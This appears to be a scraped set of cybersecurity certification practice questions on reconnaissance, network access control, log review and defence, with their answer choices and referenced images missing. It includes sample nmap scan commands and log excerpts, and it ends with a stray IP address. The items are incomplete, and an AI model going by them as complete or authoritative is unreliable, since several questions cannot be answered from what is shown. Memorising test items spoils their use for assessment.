Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file?
Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?
While performing reconnaissance of an organization’s network, Angela discovers that web.organization.com, www.organization.com, and documents.organization.com all point to the same host. What type of DNS record allows this?
Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstations she is responsible for. If she wants to do this on Windows 10 workstations, what tool should she use?
While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris’s best option to stay compliant with PCI-DSS and protect his vulnerable systems?
Senior management in Adam’s company recently read a number of articles about massive ransomware attacks that successfully targeted organizations like the one that Adam is a part of. Adam’s organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software, and a configuration management system that applies recommended operating system best practice settings to their workstations. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization?
Which of the following tools is not typically associated with the reconnaissance phase of a penetration test?
What occurs when Alex uses the following command to perform an nmap scan of a network?
nmap -sP 192.168.2.0/24
As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each subcomponent, adding it to her diagram. What is this process known as?
Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member during a penetration test. Which of the following types of attack is she least likely to be able to identify using a stateful packet inspection firewall?
Geoff’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail?
During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most likely occurring?
Why does the U.S. government require Trusted Foundry and related requirements for technology?
As part of an externally accessible information review by their security team, Bob and Lisa receive information that the security team gathered including the following entry:
Query Results:
Router: Ashburn, VA - US
Command: show bgp ipv4 unicast 10.81.254.195
BGP routing table entry for 10.64.0.0/11
Versions:
Process bRIB/RIB SendTblVer
Speaker 287479994 287479994
Last Modified: Feb 22 09:16:16.154 for 8w0d
Paths: (13 available, best #13)
Advertised to update-groups (with more than one peer):
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45
Advertised to peers (in unique update groups):
10.250.31.182
Path #1: Received by speaker 0
Not advertised to any peer
7922
10.242.151.65 (metric 6710) from (129.250.0.162)
Origin IGP, metric 4294967294, localpref 98, valid, confed-internal
Received Path ID 0, Local Path ID 0, version 0
Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922
Originator: 10.250.0.162, Cluster list: 10.250.0.9
....
Path #13: Received by speaker 0
Advertised to update-groups (with more than one peer):
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45
Advertised to peers (in unique update groups):
10.250.31.182
7922
What type of tool could they use to gather this publicly available information about their systems in the future?
A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help to mitigate this risk?
Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing?
While reviewing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered?
A NAS
Use the following scenario and image to answer the following three questions:
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information:
What issue should Amanda report to the system administrator?
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
What command can Amanda use to terminate the process?
During Geoff’s configuration of his organization’s network access control policies, he sets up client OS rules that include the following statements:
ALLOW Windows 7 version *, Windows 10 version *
ALLOW OSX version *
ALLOW iOS 8.1, iOS 9 version *
ALLOW Android 7.*
After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?
Fred has been tasked with configuring his organization’s NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user’s job?
Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open?
After a popular website is hacked, Chris begins to hear reports that email addresses from his company’s domain are listed in the hacker’s data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own company account. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses?
As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this?
Angela captured the following packets during a reconnaissance effort run by her organization’s red team. What type of information are they looking for?
Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?
Geoff wants to prevent spammers from harvesting his organization’s public LDAP directory. What technology should he implement?
How can Saria remediate the issue shown here in the MBSA screenshot?
Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Greg controls that advises them they were prevented from visiting a malicious site. What is this technique known as?
While reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file?
Jennifer is an Active Directory domain administrator for her company and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command-and-control systems?
Charleen works for a U.S. government contractor that uses NIST’s definitions to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organization’s website?
Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance?
Frank is creating the scope worksheet for his organization’s penetration test. Which of the following techniques is not typically included in a penetration test?
Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him?
Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?
ICMP "Echo request"
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:11.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?
Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan?
When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred?
Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to serves. What technology and tool should he use to do this?
As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called?
Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this?
18.227.24.60